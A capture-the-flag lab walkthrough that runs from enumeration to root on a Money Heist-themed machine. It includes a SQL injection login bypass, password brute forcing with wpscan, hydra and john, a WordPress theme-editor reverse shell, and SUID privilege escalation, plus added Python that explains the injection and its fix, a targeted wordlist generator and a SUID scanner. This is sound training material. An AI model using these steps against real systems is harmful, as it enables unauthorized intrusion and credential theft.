Let's start by finding the IP address of the target machine.

The IP address of the target machine was found to be

Scanning with nmap for open ports (-sC runs the default scripts, -Pn skips host discovery so a host that drops ping is still scanned):
• nmap -sC -Pn
After getting the IP address of the machine I enumerated the open ports with nmap and found three services: FTP, HTTP and SSH, which are the three used in the rest of this walkthrough.


2.

After enumeration I found that anonymous FTP login is allowed, so I logged in to FTP.
I downloaded todo.txt from the FTP server, but it turned out to be a honeypot: the FTP service was of no further use.

Then I moved on to the HTTP service but couldn't find anything useful, so I brute-forced directories with dirb.
It found a robots.txt file whose Disallow entry named a directory, and that directory contained a page called 's0mething.php'.

Browsing to 's0mething.php' gave me a login page.

I decided to try a SQL injection attack to bypass the login.

I used the classic payload ' or'1'='1 in the login fields. The page builds its query by concatenating the input into the SQL string, so the leading quote closes the string literal and the or'1'='1 clause makes the WHERE condition true regardless of the credentials.
And it worked.
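To show why the bypass works and what the fix looks like, here is an added example (not code from the original writeup or from the CTF's s0mething.php, whose backend is not on the page). It uses an in-memory SQLite table as a constructed stand-in for the login database and builds the query both the vulnerable way, by string concatenation, and the safe way, with bound parameters:

```python
import sqlite3

# Constructed stand-in for the login backend behind s0mething.php (assumption: the real
# page is PHP in front of some SQL database; only the query shape matters here).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")  # constructed row
    return con

def vulnerable_sql(username, password):
    """Build the query the way the vulnerable page does: by string concatenation."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))

def login_vulnerable(con, username, password):
    """True when the concatenated query matches a row; attacker quotes rewrite the SQL."""
    return con.execute(vulnerable_sql(username, password)).fetchone() is not None

def login_safe(con, username, password):
    """Parameterised version: the driver binds the values, so the payload is compared as data."""
    row = con.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None

PAYLOAD = "' or'1'='1"   # the exact payload used in the walkthrough

if __name__ == "__main__":
    con = make_db()
    print(vulnerable_sql(PAYLOAD, PAYLOAD))
    # SELECT username FROM users WHERE username='' or'1'='1' AND password='' or'1'='1'
    # AND binds tighter than OR, so this reads:
    #   username='' OR ('1'='1' AND password='') OR '1'='1'   -> always true
    print("vulnerable:", login_vulnerable(con, PAYLOAD, PAYLOAD))   # True: bypassed
    print("parameterised:", login_safe(con, PAYLOAD, PAYLOAD))      # False: rejected
```

Note that the payload has to land in both fields (or end with a comment sequence) for this query shape: injected only into the username, the trailing `AND password='...'` still has to match.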
Looking at the source code of the page I found an encoded string.

On further investigation it turned out to be base85 encoded text; decoding it with CyberChef gave 'b3lla-c1a0'. At first I couldn't tell what it was for.
Then I tried 'b3lla-c1a0' as a path in the browser and got a page that included a PDF file named 'money.pdf'.

• http://
Looking at the file properties (its header bytes, not the extension) I realised it was actually a JPEG, so I renamed it money.jpg.
Using stegcracker (a wrapper that brute-forces steghide passphrases) with rockyou.txt, I obtained the password
• stegcracker money.jpg /usr/share/wordlists/rockyou.txt

Extracting the hidden data gave me another JPEG named Heist.jpg, and on further investigation I found a word inside the image file: "la-c45a-d3-p4p3l"
• strings heist.jpg
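The two checks above (what a file really is, and what readable text it carries) are worth doing without trusting the extension or a GUI. This is an added example, not the writeup's own code: it identifies a file by its magic number, proposes the corrected name, and implements a minimal strings(1). The sample bytes are a constructed JPEG skeleton with the clue placed in a COM segment, not the CTF's actual file:

```python
import os
import re

# File signatures (magic numbers) for a few common types; these are the real,
# well-known values that file(1) also uses.
MAGIC = [
    (b"\xff\xd8\xff", "jpg"),
    (b"%PDF-", "pdf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"PK\x03\x04", "zip"),
]

def identify(data):
    """Return the type implied by the leading bytes, ignoring the file extension."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return "unknown"

def corrected_name(filename, data):
    """Rename e.g. money.pdf to money.jpg when the header says JPEG."""
    kind = identify(data)
    stem, _ext = os.path.splitext(filename)
    return filename if kind == "unknown" else stem + "." + kind

def strings(data, min_len=4):
    """Minimal strings(1): runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

# Constructed sample: a skeleton JPEG (SOI, APP0/JFIF header, a COM segment, EOI)
# whose comment segment carries the clue text. This is not the CTF's file.
SAMPLE_JPEG = (
    b"\xff\xd8"                                                       # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # APP0
    b"\xff\xfe\x00\x12la-c45a-d3-p4p3l"                               # COM, length 18 = 2 + 16 text bytes
    b"\xff\xd9"                                                       # EOI
)
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"

if __name__ == "__main__":
    print(identify(SAMPLE_JPEG), corrected_name("money.pdf", SAMPLE_JPEG))  # jpg money.jpg
    print(identify(SAMPLE_PDF))                                             # pdf
    print(strings(SAMPLE_JPEG))                                             # ['JFIF', 'la-c45a-d3-p4p3l']
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes in; the magic table only needs the first few bytes, but strings() wants the whole file.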
Browsing to that word as a path on the web server gave an unusual error that disclosed the hostname of the target (redteam), so I knew I had to add the hostname to /etc/hosts.
• nano /etc/hosts
• add " redteam"

After adding the hostname I reloaded the page and was redirected to a WordPress site. At the bottom of the page was a link to the login page, and clicking it took me to the WordPress login form.
The first thing I tried was the default credentials admin:admin.

The login error told me that the user 'admin' exists (by default WordPress's login error reveals whether the username is valid), so only the password had to be found.
To brute-force the password I used wpscan with the rockyou.txt wordlist.
The password was found to be 'admin123'.
I logged in with these credentials and reached the WordPress admin dashboard.
There are several ways to exploit a WordPress site once you have an administrator account.

What I did was generate a reverse TCP payload with msfvenom and paste it into the theme's 404 template via the theme editor.

With the shell uploaded, I set up a listener in Metasploit and browsed to http://redteam/la-c45a-d3-

That gave me a shell as 'www-data' on the target system.

4. PRIVILEGE ESCALATION

Since the www-data user does not have the necessary privileges, I had to escalate.

Looking at the home directory I concluded that the user 'profess0r' was the privileged account to aim for, the one with a route to root.
After obtaining the www-data shell I entered /home and found 3 users: profess0r, ri0 & t0kyo.

To obtain the password of the user t0kyo I created a targeted dictionary with the 'cupp' tool, then brute-forced the SSH service with hydra using that wordlist.
• hydra -l t0kyo -P silene.txt ssh://

Using hydra I got the password "tokyosilene" for the user 't0kyo'.
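The point of cupp is that a short list built from what you know about the person (name, partner, pet, dates) cracks far faster than rockyou.txt. As an added example, not the writeup's own commands and not cupp itself, here is a small generator in the same spirit: it combines seed words with case and leetspeak variants, separators, years and common suffixes, and writes a file hydra can take with -P. The seeds "Tokyo" and "Silene" are constructed from the password the walkthrough found:

```python
import itertools

# Simple leetspeak substitutions (one of the transformations cupp also offers).
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})

def variants(word):
    """Case and leet variants of a single seed word."""
    w = word.lower()
    return {w, w.capitalize(), w.upper(), w.translate(LEET)}

def targeted_wordlist(seeds, years=(), suffixes=("", "123", "!", "1"),
                      separators=("", "-", "_", ".")):
    """Build candidates from personal seed words, joining one or two of them
    with common separators, then appending years and common suffixes."""
    pool = sorted(set().union(*(variants(s) for s in seeds)))
    tails = list(suffixes) + [str(y) for y in years]
    words = set()
    for n in (1, 2):                                   # single words and pairs
        for combo in itertools.permutations(pool, n):  # order matters: tokyosilene != silenetokyo
            for sep in separators:
                base = sep.join(combo)
                for tail in tails:
                    words.add(base + tail)
    return sorted(words)

def write_wordlist(path, words):
    """One candidate per line, the format hydra -P expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")

if __name__ == "__main__":
    # Constructed seeds: the user name and the word the found password contained.
    words = targeted_wordlist(["Tokyo", "Silene"], years=(2017, 2021))
    write_wordlist("silene.txt", words)
    print(len(words), "candidates; contains tokyosilene:", "tokyosilene" in words)
```

Two seeds with two years give a list of well under two thousand entries, which hydra against SSH finishes in minutes; keep the thread count low (-t 4) so the SSH daemon does not start dropping connections.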
Next I logged in over SSH with these credentials as 't0kyo'.
In t0kyo's home directory I found 2 files named 'gift' and 'letter'.
Opening them gave me a clue for the next user, ri0.

Opening 'gift' showed a message from Rio to Tokyo, and opening 'letter' gave me a password hash.
• cat gift
• cat letter

I saved the hash to a file and cracked it with john using a SecLists wordlist (john detects the hash format on its own):
• john --wordlist=/usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords.txt rio.txt

The password was found to be '!!Estresado!!'

So I switched to the user ri0.
• su ri0

Enumerating the directories, I found a message from Berlin to Rio.

From the message it was clear that the file 'thegiftofprofessor' contained something that would get me to the privileged user.
Enumerating further, I discovered a private SSH key file named 'thegiftofprofessor' in /usr/games/user
• cat thegiftofprofessor

I copied the SSH key to another file, 'sshkey'.

5. GAINING

With the private SSH key obtained I logged in as the privileged user 'profess0r'. SSH refuses a private key that other users can read, so the permissions have to be restricted first.
• chmod 700 sshkey
• ssh -i sshkey profess0r@

Then I enumerated files with the SUID bit set.

• find / -perm -u=s -type f 2>/dev/null
A file named 'shell' in the home directory looked suspicious. Checking its properties showed it was a SUID executable that runs whatever command it is given, so I used it to spawn a root shell.
• ./shell /bin/bash

Voila! Root access acquired.
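The SUID sweep is only useful if the odd one out stands out from the dozen SUID binaries every distribution ships. As an added example (not from the writeup) here is the same search in Python with a baseline filter, so a file like 'shell' in a home directory is reported and sudo, passwd and friends are not. The BASELINE set is an assumption for a stock Debian/Ubuntu install and should be adjusted for the target; the demo tree is a constructed fixture so the scan can be exercised without root:

```python
import os
import stat
import tempfile

# SUID binaries normally present on a stock Debian/Ubuntu system (assumption: a starting
# baseline, to be trimmed or extended for the target's distribution).
BASELINE = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
    "pkexec", "fusermount", "fusermount3", "ping", "ssh-keysign", "chage", "expiry",
}

def find_suid(root="/"):
    """Python equivalent of: find ROOT -perm -u=s -type f 2>/dev/null"""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # unreadable entry, same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def suspicious(paths, baseline=BASELINE):
    """Keep only SUID files whose name is not in the known-good baseline."""
    return [p for p in paths if os.path.basename(p) not in baseline]

def make_demo_tree():
    """Constructed fixture: a temp directory with a fake SUID 'shell' in a home
    directory, a fake SUID 'passwd' under usr/bin, and one plain file."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    home = os.path.join(base, "home", "profess0r")
    binp = os.path.join(base, "usr", "bin")
    os.makedirs(home)
    os.makedirs(binp)
    for path, mode in ((os.path.join(home, "shell"), 0o4755),
                       (os.path.join(binp, "passwd"), 0o4755),
                       (os.path.join(home, "notes.txt"), 0o644)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)                 # owner may set SUID on own files
    return base

if __name__ == "__main__":
    root = make_demo_tree()
    found = find_suid(root)
    print("suid files:", found)
    print("not in baseline:", suspicious(found))   # only .../home/profess0r/shell
```

Anything the filter leaves over deserves a look with `ls -l`, `file` and `strings` before it is run: a SUID binary that passes its argument to a shell, as 'shell' did here, is root for the taking, but one that is writable or calls programs by relative path is exploitable in other ways too.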

